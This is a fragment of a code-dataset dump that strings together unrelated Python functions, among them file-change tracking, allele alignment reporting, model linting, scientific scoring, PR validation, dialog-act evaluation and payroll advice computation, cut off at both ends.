[self.saved_files_data[path] for path in missing_files_paths]\n added_files_paths = list(set(current_files_paths).difference(set(saved_files_paths)))\n added_files_hashes = [current_files_data[path] for path in 
added_files_paths]\n\n # get moved files paths\n moved_files_hashes = list(set(missing_files_hashes).intersection(set(added_files_hashes)))\n moved_files_paths = [\n json.dumps({\n 'from': self.get_file_path_by_hash(self.saved_files_data, hash_),\n 'to': self.get_file_path_by_hash(current_files_data, hash_)\n }) for hash_ in moved_files_hashes\n ]\n\n # get missing files paths\n missing_files_paths = [ # remove \"moved\" files paths\n self.get_file_path_by_hash(self.saved_files_data, hash_)\n for hash_ in missing_files_hashes if hash_ not in moved_files_hashes\n ]\n\n # get added files paths\n added_files_paths = [ # remove \"moved\" files paths\n self.get_file_path_by_hash(current_files_data, hash_)\n for hash_ in added_files_hashes if hash_ not in moved_files_hashes\n ]\n\n # get edited files paths\n remained_files_paths = list(set(saved_files_paths).intersection(set(current_files_paths)))\n for file_path in remained_files_paths:\n if self.saved_files_data[file_path] != current_files_data[file_path]: # compare hashes\n missing_files_paths.append(file_path)\n added_files_paths.append(file_path)\n\n if any([missing_files_paths, added_files_paths, moved_files_paths]):\n self.saved_files_data = current_files_data\n\n return missing_files_paths, added_files_paths, moved_files_paths", "def report_unknown_indel_results(allele1, allele2, \\\n five_prime_diff, five_prime_variant_len, three_prime_diff, three_prime_variant_len):\n \n if five_prime_diff == 'error - cannot compare' or three_prime_diff == 'error - cannot compare':\n relative_sequence_alignment = '{} and {} cannot be compared using the MSF file'.format(allele1, allele2)\n return relative_sequence_alignment\n \n if five_prime_diff == 'deletion':\n if three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len)\n\n elif three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} has a staggered 3' end overlap with {}; 5' end {}bp overhang; 3' {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif five_prime_diff == 'insertion':\n if three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} has a staggered 5' end overlap with {}; 5' {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n \n elif five_prime_diff == 'no diff':\n if three_prime_diff == 'deletion':\n relative_sequence_alignment = \"{} is a superset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'insertion':\n relative_sequence_alignment = \"{} is a subset of {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n 
format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n \n elif three_prime_diff == 'no diff':\n relative_sequence_alignment = \"{} is aligned with {}; 5' end {}bp overhang; 3' end {}bp overhang\".\\\n format(allele1, allele2, five_prime_variant_len, three_prime_variant_len) \n\n\n \n return relative_sequence_alignment", "def lint(self):\n report = OrderedDict()\n\n for index, slice in self.slices.iterrows():\n inputs, outputs = create_activations(slice)\n inf = inputs[0].format[:4]\n outf = outputs[0].format[:4]\n if inf != outf:\n mitigation = \"\"\n if \"INT8\" in [inf, outf]:\n mitigation = \"Consider adding quantization around float operations.\"\n report[slice.Name] = OrderedDict({\n 'name': slice.Name,\n 'type conversion': f\"{inf} -> {outf}\",\n 'shape conversion': f\"{inputs[0].shape} -> {outputs[0].shape}\",\n 'hazard': \"Slice layer is converting operand data type.\",\n 'mitigation': mitigation,\n 'help': \"Conversions between float32 and float16 are a red \"\n \"flag, as are conversions between float32/16 <=> INT8.\"\n })\n\n df = pd.DataFrame.from_dict(report, orient='index')\n return df", "def compute(cls, observation, prediction, distances):\n\n errors = collections.OrderedDict()\n\n for i in range (0, len(distances)):\n if 'mean_AP1_amp_strong_propagating_at_'+str(distances[i])+'um' in observation.keys() or 'mean_AP1_amp_weak_propagating_at_'+str(distances[i])+'um' in observation.keys():\n p_value = prediction['model_AP1_amp_at_'+str(distances[i])+'um']['mean']\n o_mean = observation['mean_AP1_amp_strong_propagating_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_strong_propagating_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_strong_propagating_at_'+str(distances[i])] = error\n\n\n o_mean = observation['mean_AP1_amp_weak_propagating_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_weak_propagating_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_weak_propagating_at_'+str(distances[i])] = error\n\n else:\n p_value = prediction['model_AP1_amp_at_'+str(distances[i])+'um']['mean']\n o_mean = observation['mean_AP1_amp_at_'+str(distances[i])+'um']\n o_std = observation['std_AP1_amp_at_'+str(distances[i])+'um']\n\n try:\n error = abs(p_value - o_mean)/o_std\n error = assert_dimensionless(error)\n except (TypeError,AssertionError) as e:\n error = e\n errors['AP1_amp_at_'+str(distances[i])] = error\n\n for i in range (0, len(distances)): # to keep better order: first all AP1, then all APlast\n p_value_l = prediction['model_APlast_amp_at_'+str(distances[i])+'um']['mean']\n o_mean_l = observation['mean_APlast_amp_at_'+str(distances[i])+'um']\n o_std_l = observation['std_APlast_amp_at_'+str(distances[i])+'um']\n\n try:\n error_l = abs(p_value_l - o_mean_l)/o_std_l\n error_l = assert_dimensionless(error_l)\n except (TypeError,AssertionError) as e:\n error_l = e\n errors['APlast_amp_at_'+str(distances[i])] = error_l\n\n score_sum_strong_propagating = 0.0\n score_sum_weak_propagating = 0.0\n\n for key, value in errors.iteritems():\n if 'strong' not in key:\n score_sum_weak_propagating += value\n for key, value in errors.iteritems():\n if 'weak' not in key:\n score_sum_strong_propagating += value\n return [score_sum_strong_propagating, score_sum_weak_propagating], 
errors", "def _get_diff2_data(request, ps_left_id, ps_right_id, patch_id, context,\n column_width, patch_filename=None):\n ps_left = models.PatchSet.get_by_id(int(ps_left_id), parent=request.issue.key)\n if ps_left is None:\n return HttpTextResponse(\n 'No patch set exists with that id (%s)' % ps_left_id, status=404)\n ps_left.issue_key = request.issue.key\n ps_right = models.PatchSet.get_by_id(\n int(ps_right_id), parent=request.issue.key)\n if ps_right is None:\n return HttpTextResponse(\n 'No patch set exists with that id (%s)' % ps_right_id, status=404)\n ps_right.issue_key = request.issue.key\n if patch_id is not None:\n patch_right = models.Patch.get_by_id(int(patch_id), parent=ps_right.key)\n else:\n patch_right = None\n if patch_right is not None:\n patch_right.patchset_key = ps_right.key\n if patch_filename is None:\n patch_filename = patch_right.filename\n # Now find the corresponding patch in ps_left\n patch_left = models.Patch.query(\n models.Patch.patchset_key == ps_left.key,\n models.Patch.filename == patch_filename).get()\n\n if patch_left:\n try:\n new_content_left = patch_left.get_patched_content()\n except FetchError as err:\n return HttpTextResponse(str(err), status=404)\n lines_left = new_content_left.lines\n elif patch_right:\n lines_left = patch_right.get_content().lines\n else:\n lines_left = []\n\n if patch_right:\n try:\n new_content_right = patch_right.get_patched_content()\n except FetchError as err:\n return HttpTextResponse(str(err), status=404)\n lines_right = new_content_right.lines\n elif patch_left:\n lines_right = patch_left.get_content().lines\n else:\n lines_right = []\n\n rows = engine.RenderDiff2TableRows(request,\n lines_left, patch_left,\n lines_right, patch_right,\n context=context,\n colwidth=column_width)\n rows = list(rows)\n if rows and rows[-1] is None:\n del rows[-1]\n\n return dict(patch_left=patch_left, patch_right=patch_right,\n ps_left=ps_left, ps_right=ps_right, rows=rows)", "def analyze_prior_results(self, analysis_source):\n #TODO: move to iota_run.py\n\n from iota.components.iota_analysis import Analyzer\n from libtbx import easy_pickle as ep\n\n if os.path.isdir(analysis_source):\n int_folder = os.path.abspath(analysis_source)\n else:\n try:\n int_folder = os.path.abspath(os.path.join(os.curdir,\n 'integration/{}/image_objects'.format(analysis_source)))\n except ValueError:\n int_folder = None\n print ('Run #{} not found'.format(analysis_source))\n\n if os.path.isdir(int_folder):\n with prog_message('Analyzing Results'):\n int_list = [os.path.join(int_folder, i) for i in os.listdir(int_folder)]\n img_objects = [ep.load(i) for i in int_list if i.endswith('.int')]\n\n self.logfile = os.path.abspath(os.path.join(int_folder, 'iota.log'))\n self.viz_base = os.path.join('/'.join(int_folder.split('/')),\n 'vizualization')\n\n self.params.analysis.cluster_write_files=False\n\n analysis = Analyzer(self, img_objects, self.iver)\n analysis.print_results()\n analysis.unit_cell_analysis()\n analysis.print_summary(write_files=False)\n else:\n print ('No results found in {}'.format(int_folder))", "def _restore_sampler_from_reporter(self, reporter):\n # Read the last iteration reported to ensure we don't include junk\n # data written just before a crash.\n logger.debug(\"Reading storage file {}...\".format(reporter.filepath))\n metadata = reporter.read_dict('metadata')\n thermodynamic_states, unsampled_states = reporter.read_thermodynamic_states()\n\n def _read_options(check_iteration):\n internal_sampler_states = 
reporter.read_sampler_states(iteration=check_iteration)\n internal_state_indices = reporter.read_replica_thermodynamic_states(iteration=check_iteration)\n internal_energy_thermodynamic_states, internal_neighborhoods, internal_energy_unsampled_states = \\\n reporter.read_energies(iteration=check_iteration)\n internal_n_accepted_matrix, internal_n_proposed_matrix = \\\n reporter.read_mixing_statistics(iteration=check_iteration)\n\n # Search for last cached free energies only if online analysis is activated.\n internal_last_mbar_f_k, internal_last_err_free_energy = None, None\n if self.online_analysis_interval is not None:\n online_analysis_info = self._read_last_free_energy(reporter, check_iteration)\n try:\n internal_last_mbar_f_k, (_, internal_last_err_free_energy) = online_analysis_info\n except TypeError:\n # Trap case where online analysis is set but not run yet and (_, ...) = None is not iterable\n pass\n return (internal_sampler_states, internal_state_indices, internal_energy_thermodynamic_states,\n internal_neighborhoods, internal_energy_unsampled_states, internal_n_accepted_matrix,\n internal_n_proposed_matrix, internal_last_mbar_f_k, internal_last_err_free_energy)\n\n # Keep trying to resume further and further back from the most recent checkpoint back\n checkpoints = reporter.read_checkpoint_iterations()\n checkpoint_reverse_iter = iter(checkpoints[::-1])\n while True:\n try:\n checkpoint = next(checkpoint_reverse_iter)\n output_data = _read_options(checkpoint)\n # Found data, can escape loop\n break\n except StopIteration:\n raise self._throw_restoration_error(\"Attempting to restore from any checkpoint failed. \"\n \"Either your data is fully corrupted or something has gone very \"\n \"wrong to see this message. \"\n \"Please open an issue on the GitHub issue tracker if you see this!\")\n except Exception as err:\n raise err\n # Trap all other errors caught by the load process\n continue\n\n if checkpoint < checkpoints[-1]:\n logger.warning(\"Could not use most recent checkpoint at {}, instead pulled from {}\".format(checkpoints[-1],\n checkpoint))\n (sampler_states, state_indices, energy_thermodynamic_states, neighborhoods, energy_unsampled_states,\n n_accepted_matrix, n_proposed_matrix, last_mbar_f_k, last_err_free_energy) = output_data\n # Assign attributes.\n self._iteration = int(checkpoint) # The int() can probably be removed when pinned to NetCDF4 >=1.4.0\n self._thermodynamic_states = thermodynamic_states\n self._unsampled_states = unsampled_states\n self._sampler_states = sampler_states\n self._replica_thermodynamic_states = np.array(state_indices)\n self._energy_thermodynamic_states = energy_thermodynamic_states\n self._neighborhoods = neighborhoods\n self._energy_unsampled_states = energy_unsampled_states\n self._n_accepted_matrix = np.array(n_accepted_matrix)\n self._n_proposed_matrix = np.array(n_proposed_matrix)\n self._metadata = metadata\n\n self._last_mbar_f_k = last_mbar_f_k\n self._last_err_free_energy = last_err_free_energy\n\n # initialize timing dictionary\n self._timing_data = dict()\n\n # Initialize context caches\n self._initialize_context_caches()", "def check_file_locations(store: dict[str, Any]) -> ValidationStepResult:\n success: bool = True\n filtered_files: dict[PullRequestFileType, list[File]] = (\n store[\"filtered_files\"]\n )\n all_labels: dict[str, Label] = store[\"possible_labels\"]\n labels: set[Label] = set()\n comments: list[str] = []\n errors: dict[os.PathLike, list[str]] = {}\n\n forecast_folder_name = store[\"FORECAST_FOLDER_NAME\"]\n 
logger.info(\n f\"Checking if the PR is updating outside the {forecast_folder_name}/ folder...\"\n )\n if (\n PullRequestFileType.OTHER_NONFS in filtered_files or\n PullRequestFileType.OTHER_FS in filtered_files\n ):\n logger.info((\n \"⚠️ PR contains file changes that are not part of a valid \"\n \"forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n ))\n comments.append(\n \"⚠️ PR contains file changes that are not part of a valid \"\n \"forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n )\n labels.add(all_labels[\"other-files-updated\"])\n\n if (\n PullRequestFileType.MODEL_OTHER_FS in filtered_files \n ):\n success = False\n logger.info((\n \"❌ PR contains files submitted in the model folder that are not part of a valid \"\n \"forecast submission\"\n ))\n comments.append(\n \"❌ PR contains files submitted in the model folder that are not part of a valid \"\n \"forecast submission\"\n )\n \n else:\n logger.info((\n \"✔️ PR does not contain file changes that are not part of a \"\n \"valid forecast submission (misnamed/misplaced forecast CSV, \"\n \"non CSV files, etc.)\"\n ))\n\n logger.info(\"Checking if the PR contains misplaced CSVs...\")\n submission_formatting_instruction = store[\"SUBMISSION_FORMATTING_INSTRUCTION\"]\n\n if (PullRequestFileType.FORECAST not in filtered_files and\n PullRequestFileType.OTHER_FS in filtered_files):\n success = False\n logger.info(\"❌ PR contains misplaced CSVs.\")\n for github_file in filtered_files[PullRequestFileType.OTHER_FS]:\n path = pathlib.Path(github_file.filename)\n errors[path] = [(\n \"The forecast CSV or metadata file is located in an \"\n \"incorrect location and/or is misnamed (see \"\n f\"[here]({submission_formatting_instruction})\"\n \" for submission instructions. 
Please correct the errors \"\n \"accordingly.\\n\"\n \"We will still check any misplaced CSV(s) for \"\n \"you, so that you can be sure that the CSVs are correct, \"\n \"or correct any actual file content validation errors if \"\n \"not.\"\n )]\n else:\n logger.info(\"✔️ PR does not contain misplaced forecasts\")\n\n logger.info(\"Checking if the PR contains metadata updates...\")\n if PullRequestFileType.METADATA in filtered_files:\n logger.info(\"💡 PR contains metadata updates\")\n comments.append(\"💡 PR contains metadata file changes.\")\n labels.add(all_labels[\"metadata-change\"])\n\n return ValidationStepResult(\n success=success,\n labels=labels,\n comments=comments,\n file_errors=errors\n )", "def log_diff(template_index, exists_in_source, source_row, exists_in_dest,\n dest_row):\n\n template = nori.core.cfg['templates'][template_index]\n\n if nori.core.cfg['report_order'] == 'template':\n if template_index not in diff_dict:\n diff_dict[template_index] = []\n diff_dict[template_index].append((exists_in_source, source_row,\n exists_in_dest, dest_row, None))\n diff_k = template_index\n diff_i = len(diff_dict[template_index]) - 1\n elif nori.core.cfg['report_order'] == 'keys':\n keys_str = ()\n if source_row is not None:\n num_keys = source_row[0]\n source_data = source_row[1]\n keys_tuple = source_data[0:num_keys]\n elif dest_row is not None:\n num_keys = dest_row[0]\n dest_data = dest_row[1]\n keys_tuple = dest_data[0:num_keys]\n if keys_tuple not in diff_dict:\n diff_dict[keys_tuple] = []\n diff_dict[keys_tuple].append((template_index, exists_in_source,\n source_row, exists_in_dest, dest_row,\n None))\n diff_k = keys_tuple\n diff_i = len(diff_dict[keys_tuple]) - 1\n\n if exists_in_source:\n source_str = nori.pps(source_row[1])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n dest_str = nori.pps(dest_row[1])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n\n nori.core.status_logger.info(\n 'Diff found for template {0} ({1}):\\nS: {2}\\nD: {3}' .\n format(template_index, nori.pps(template[T_NAME_KEY]),\n source_str, dest_str)\n )\n return (diff_k, diff_i)", "def analyze_frame(idx,true_frame, pred_frame):\n global total_act\n global total_correct\n global acts \n global k \n global slots\n global wrong_act_wrong_slot\n global right_act_wrong_slot\n global right_act_right_slot\n global wrong_act_right_slot\n # Compare Dialog Actss\n flag = 0 \n true_act = true_frame['act'] if 'act' in true_frame else None\n pred_act = pred_frame['act'] if 'act' in pred_frame else None\n\n true_act_split = true_act.split(\":\")\n true_act_simple = true_act_split[1] \n true_act_detail = ':'.join(true_act_split[2:])\n\n if pred_act is None : \n wrong_act_wrong_slot.add(idx)\n return None \n pred_act_split = pred_act.split(\":\")\n if pred_act != \"ERR:CHITCHAT\" and pred_act != \"ERR:MISSING_CONTEXT\" and len(pred_act_split) < 3 : \n wrong_act_wrong_slot.add(idx)\n return None \n pred_act_simple = pred_act_split[1] \n pred_act_detail = ':'.join(pred_act_split[2:])\n #ipdb.set_trace(context=20) \n if true_act_simple in acts : \n acts[true_act_simple]['total'] = acts[true_act_simple]['total'] + 1\n if true_act_detail in acts[true_act_simple]['detail'] : ## already exists\n acts[true_act_simple]['detail'][true_act_detail]['total'] += 1\n else : \n if not 
acts[true_act_simple]['detail'].get(true_act_detail) : \n acts[true_act_simple]['detail'][true_act_detail] = {\n 'total' : 1,\n 'correct' : 0,\n 'all-wrong' : {\n\n },\n 'part-wrong' : {\n\n } \n }\n else :\n acts[true_act_simple] = {\n 'total' : 1,\n 'correct' : 0,\n 'detail' : {\n\n }\n }\n acts[true_act_simple]['detail'][true_act_detail] = {\n 'total' : 1,\n 'correct' : 0,\n 'all-wrong' : {\n\n },\n 'part-wrong' : {\n\n } \n }\n \n if true_act == pred_act : ## Act correctly predicted \n flag = 1\n right_act_right_slot.add(idx)\n total_correct = total_correct + 1\n total_act = total_act + 1 \n acts[true_act_simple]['correct'] += 1\n if acts[true_act_simple]['detail'].get(true_act_detail) is None : \n acts[true_act_simple]['detail'][true_act_detail]['correct'] = 1\n else : \n acts[true_act_simple]['detail'][true_act_detail]['correct'] = acts[true_act_simple]['detail'][true_act_detail]['correct'] + 1\n else : \n\n total_act = total_act + 1 \n #ipdb.set_trace(context=20) \n if true_act_simple == pred_act_simple : ## Correct DA but wrong activities\n if not acts[true_act_simple]['detail'].get(true_act_detail)['part-wrong'] : \n acts[true_act_simple]['detail'].get(true_act_detail)['part-wrong'] = { \n pred_act_detail : 1 \n }\n else :\n if pred_act_detail in acts[true_act_simple]['detail'][true_act_detail]['part-wrong'] : \n acts[true_act_simple]['detail'][true_act_detail]['part-wrong'][pred_act_detail] += 1\n else : \n acts[true_act_simple]['detail'][true_act_detail]['part-wrong'][pred_act_detail] = 1\n\n else : ## All wrong \n if not acts[true_act_simple]['detail'].get(true_act_detail)['all-wrong'] : \n acts[true_act_simple]['detail'].get(true_act_detail)['all-wrong'] = {\n pred_act : 1 \n }\n else :\n if pred_act in acts[true_act_simple]['detail'][true_act_detail]['all-wrong'] : \n acts[true_act_simple]['detail'][true_act_detail]['all-wrong'][pred_act] += 1\n else :\n acts[true_act_simple]['detail'][true_act_detail]['all-wrong'][pred_act] = 1\n \n\n\n # Compare Slots\n true_frame_slot_values = {f'{k}={v}' for k, v in true_frame.get('slots', [])}\n pred_frame_slot_values = {f'{k}={v}' for k, v in pred_frame.get('slots', [])}\n \n if flag == 1 : ## if right DA, check slots \n if true_frame_slot_values == pred_frame_slot_values : ## perfect prediction made \n right_act_right_slot.add(idx)\n else : \n right_act_wrong_slot.add(idx)\n else :\n if true_frame_slot_values == pred_frame_slot_values : \n wrong_act_right_slot.add(idx)\n else :\n wrong_act_wrong_slot.add(idx)", "def test_unchanged_status_text(self):\n scale = \"count\"\n metric1 = dict(type=\"metric_type\",\n name=\"Metric\",\n unit=\"units\",\n scale=scale,\n recent_measurements=[dict(count=dict(value=0,\n status=\"near_target_met\")),\n dict(count=dict(value=42,\n status=\"near_target_met\"))])\n metric2 = dict(type=\"metric_type\",\n name=\"Metric\",\n unit=\"units\",\n scale=scale,\n recent_measurements=[dict(count=dict(value=5,\n status=\"target_met\")),\n dict(count=dict(value=10,\n status=\"target_not_met\"))])\n metric_notification_data1 = MetricNotificationData(metric1, self.data_model, \"status_long_unchanged\")\n metric_notification_data2 = MetricNotificationData(metric2, self.data_model, \"status_long_unchanged\")\n notification = Notification(self.report, [metric_notification_data1,\n metric_notification_data2], \"destination_uuid\", {})\n text = build_notification_text(notification)\n self.assertEqual(\n \"[Report 1](https://report1) has 2 metrics that are notable:\\n\\n\"\n \"* Metric has been yellow (near target met) 
for three weeks. Value: 42 units.\\n\"\n \"* Metric has been red (target not met) for three weeks. Value: 10 units.\\n\",\n text)", "def preprocess_one(workcalc):\n \n workcalc_name = workcalc.get_attrs()['_process_label']\n version_preproc_dict = workchain_preproc_and_viewer_info[workcalc_name]\n \n prefix = None\n reason = None\n \n for prefix_version in version_preproc_dict:\n n_calls = version_preproc_dict[prefix_version]['n_calls']\n retr_list_per_step = version_preproc_dict[prefix_version]['retrieved_files']\n \n # ---\n # check if number of calls matches\n if len(workcalc.get_outputs()) < n_calls:\n if reason is None:\n reason = \"Not all calculations started.\"\n continue\n \n # ---\n # check if all specified files are retrieved\n success = True\n for rlps in retr_list_per_step:\n calc_step, retr_list = rlps\n calc = workcalc.get_outputs()[calc_step]\n retrieved_files = calc.out.retrieved.get_folder_list()\n if not all(f in retrieved_files for f in retr_list):\n if reason is None:\n reason = \"Not all files were retrieved.\"\n success = False\n break\n if not success:\n continue\n \n # ---\n # check if the required parameter is there\n if 'req_param' in version_preproc_dict[prefix_version]:\n req_param, req_key = version_preproc_dict[prefix_version]['req_param']\n inp_dict = workcalc.get_inputs_dict()\n if not (req_param in inp_dict and req_key in inp_dict[req_param].dict):\n if reason is None:\n reason = \"Required parameter not existing.\"\n continue\n \n # ---\n # found match! \n prefix = prefix_version\n break\n \n if prefix is None:\n raise(Exception(reason))\n \n structure = workcalc.get_inputs_dict()[version_preproc_dict[prefix]['struct_label']]\n pk_numbers = [e for e in structure.get_extras() if e.startswith(prefix[:-1])]\n pk_numbers = [int(e.split('_')[1]) for e in pk_numbers if e.split('_')[1].isdigit()]\n pks = [e[1] for e in structure.get_extras().items() if e[0].startswith(prefix[:-1])]\n if workcalc.pk in pks:\n return\n nr = 1\n if len(pk_numbers) != 0:\n for nr in range(1, 100):\n if nr in pk_numbers:\n continue\n break\n structure.set_extra('%s_%d_pk'% (prefix, nr), workcalc.pk)", "def lf_abnormal_interp_with_spikes(report):\n if 'interpretation' in report.sections.keys():\n interpretation = report.sections['interpretation']\n interp_text = interpretation['text']\n return abnormal_interp_with_spikes(interp_text)\n elif 'summary' in report.sections:\n return abnormal_interp_with_spikes(report.sections['summary']['text'])\n elif 'findings' in report.sections: # fall back to look in the findings \n if 'summary' in report.sections['findings']: # fall back to look for a summary instead\n return abnormal_interp_with_spikes(report.sections['findings']['summary'])\n if 'impression' in report.sections['findings']:\n return abnormal_interp_with_spikes(report.sections['findings']['impression'])\n return ABSTAIN_VAL\n elif 'narrative' in report.sections: # fall back to look in the findings \n ky = 'narrative'\n if 'summary' in report.sections[ky]: # fall back to look for a summary instead\n return abnormal_interp_with_spikes(report.sections[ky]['summary'])\n if 'impression' in report.sections[ky]:\n return abnormal_interp_with_spikes(report.sections[ky]['impression'])\n # could try running on all of findings but would really need to check then\n \n return ABSTAIN_VAL \n else:\n return ABSTAIN_VAL", "def rel_errors(self):\n ped_entries = {m[\"patient\"]: m for m in self.pedigree}\n result = {}\n import_job = ImportVariantsBgJob.objects.filter(case_name=self.name).order_by(\n 
\"-date_created\"\n )\n if import_job and not import_job[0].bg_job.status == \"done\":\n return result\n\n try:\n variant_set = self.latest_variant_set\n if variant_set:\n for rel_stats in variant_set.variant_stats.relatedness.all():\n relationship = \"other\"\n if (\n ped_entries[rel_stats.sample1][\"father\"]\n == ped_entries[rel_stats.sample2][\"father\"]\n and ped_entries[rel_stats.sample1][\"mother\"]\n == ped_entries[rel_stats.sample2][\"mother\"]\n and ped_entries[rel_stats.sample1][\"father\"] != \"0\"\n and ped_entries[rel_stats.sample1][\"mother\"] != \"0\"\n ):\n relationship = \"sibling-sibling\"\n elif (\n ped_entries[rel_stats.sample1][\"father\"] == rel_stats.sample2\n or ped_entries[rel_stats.sample1][\"mother\"] == rel_stats.sample2\n or ped_entries[rel_stats.sample2][\"father\"] == rel_stats.sample1\n or ped_entries[rel_stats.sample2][\"mother\"] == rel_stats.sample1\n ):\n relationship = \"parent-child\"\n if (\n relationship == \"sibling-sibling\"\n and rel_stats.relatedness() < THRESH_SIBLING\n ) or (\n relationship == \"parent-child\" and rel_stats.relatedness() < THRESH_PARENT\n ):\n for sample in (rel_stats.sample1, rel_stats.sample2):\n result.setdefault(sample, []).append(\n (\n \"pedigree shows {} relation for {} and {} but variants show low degree \"\n \"of relatedness\"\n ).format(\n relationship,\n only_source_name(rel_stats.sample1),\n only_source_name(rel_stats.sample2),\n )\n )\n return result\n except SmallVariantSet.variant_stats.RelatedObjectDoesNotExist:\n return {}", "def diff_it(self):\n data = {}\n differ = difflib.Differ()\n first = self.first.data.keys()\n first.sort()\n second = self.second.data.keys()\n second.sort()\n # Save data differently if file was measured only in first, only\n # in second or in both reports\n for item in differ.compare(first, second):\n fil = item[2:]\n mode = item[:1]\n if mode == ' ':\n data[fil] = [self.first.data[fil], self.second.data[fil]]\n elif mode == '+':\n data[fil] = [None, self.second.data[fil]]\n elif mode == '-':\n data[fil] = [self.first.data[fil], None]\n return collections.OrderedDict(sorted(data.items()))", "def _consist_numeric(col, _df1, _df2, _key1, _key2, img_dir, date_flag=False):\n\n df1, df2 = _df1.copy(), _df2.copy()\n df = pd.merge(df1, df2, left_on=_key1, right_on=_key2, how=\"inner\")\n\n if (df['%s_x' %(col)].dropna().shape[0] == 0) or (df['%s_y' %(col)].dropna().shape[0] == 0):\n if (df['%s_x' %(col)].dropna().shape[0] == 0) and (df['%s_y' %(col)].dropna().shape[0] == 0):\n error_msg = 'all nan in both table'\n elif df['%s_x' %(col)].dropna().shape[0] == 0:\n error_msg = 'all nan in table1'\n else:\n error_msg = 'all nan in table2'\n return {'column': col, 'error_msg': error_msg}\n\n df = df.dropna(how='any', subset=['%s_x' % (col), '%s_y' % (col)]).reset_index(drop=True)\n df['diff_temp'] = df['%s_y' %(col)] - df['%s_x' %(col)]\n corr = round(spearmanr(df['%s_x' %(col)].values, df['%s_y' %(col)].values)[0], 3)\n\n output = [\n {'feature': 'column', 'value': col, 'graph': 'consistency check'},\n {'feature': 'corr', 'value': corr},\n {'feature': 'min diff', 'value': round(df['diff_temp'].min(), 3)},\n {'feature': 'mean diff', 'value': round(df['diff_temp'].mean(), 3)},\n {'feature': 'median diff', 'value': round(df['diff_temp'].median(), 3)},\n {'feature': 'max diff', 'value': round(df['diff_temp'].max(), 3)},\n ]\n\n draw_values = df['diff_temp'].dropna().values\n origin_value_4 = [np.min(draw_values), np.mean(draw_values), np.median(draw_values), np.max(draw_values)]\n\n # get 
distribution\n scale_flg = 0\n draw_value_4 = origin_value_4\n if np.max([abs(origin_value_4[0]), abs(origin_value_4[3])]) >= pow(10, 6):\n scale_flg = 1\n draw_values, draw_value_4 = _get_scale_draw_values(draw_values, draw_value_4)\n\n # draw the scatter plot\n both_min = np.min([df['%s_x' %(col)].min(), df['%s_y' %(col)].min()])\n both_max = np.max([df['%s_x' %(col)].max(), df['%s_y' %(col)].max()])\n\n dpi = 72\n plt.figure(figsize=(635. / dpi, 635. / (9. / 4.) / dpi), dpi=dpi)\n plt.subplot(121)\n plt.title('Scatter plot for values')\n plt.scatter(df['%s_x' %(col)].values, df['%s_y' %(col)].values, c=TABLE1_DARK, s=5)\n plt.plot([both_min, both_max], [both_min, both_max], '--', c='#bbbbbb')\n\n plt.xlim(both_min, both_max)\n plt.ylim(both_min, both_max)\n\n ax2 = plt.subplot(122)\n if len(np.unique(draw_values)) <= 10:\n sns.countplot(draw_values, palette=sns.color_palette([TABLE2_DARK]))\n if len(np.unique(draw_values)) > 5:\n plt.xticks(rotation=90)\n else:\n sns.distplot(draw_values, color=TABLE2_DARK)\n y_low, y_up = ax2.get_ylim()\n _draw_texts(text_values=origin_value_4, draw_value_4=draw_value_4, mark=1, y_low=y_low, y_up=y_up)\n\n if date_flag:\n plt.title('Distribution of differences (in months)')\n elif scale_flg:\n plt.title('Distribution of differences (log10 scale)')\n else:\n plt.title('Distribution of differences')\n\n # save the graphs\n # adjust graph name\n graph_name = col\n if '/' in graph_name:\n graph_name = graph_name.replace('/', '')\n plt.savefig(os.path.join(img_dir, graph_name + '.png'), transparent=True, dpi=dpi)\n return {'column': col, 'result_df': pd.DataFrame(output), 'corr': {'column': col, 'corr': corr}}", "def compute_advice(self):\n for advice in self:\n old_lines = self.env['hr.payroll.advice.line'].search([('advice_id', '=', advice.id)])\n if old_lines:\n old_lines.unlink()\n payslips = self.env['hr.payslip'].search([('date_from', '<=', advice.date), ('date_to', '>=', advice.date), ('state', '=', 'done')])\n for slip in payslips:\n if not slip.sudo().employee_id.bank_account_id and not slip.sudo().employee_id.bank_account_id.acc_number:\n raise UserError(_('Please define bank account for the %s employee') % (slip.employee_id.name,))\n payslip_line = self.env['hr.payslip.line'].search([('slip_id', '=', slip.id), ('code', '=', 'NET')], limit=1)\n if payslip_line:\n self.env['hr.payroll.advice.line'].create({\n 'advice_id': advice.id,\n 'name': slip.sudo().employee_id.bank_account_id.acc_number,\n 'ifsc_code': slip.sudo().employee_id.bank_account_id.bank_bic 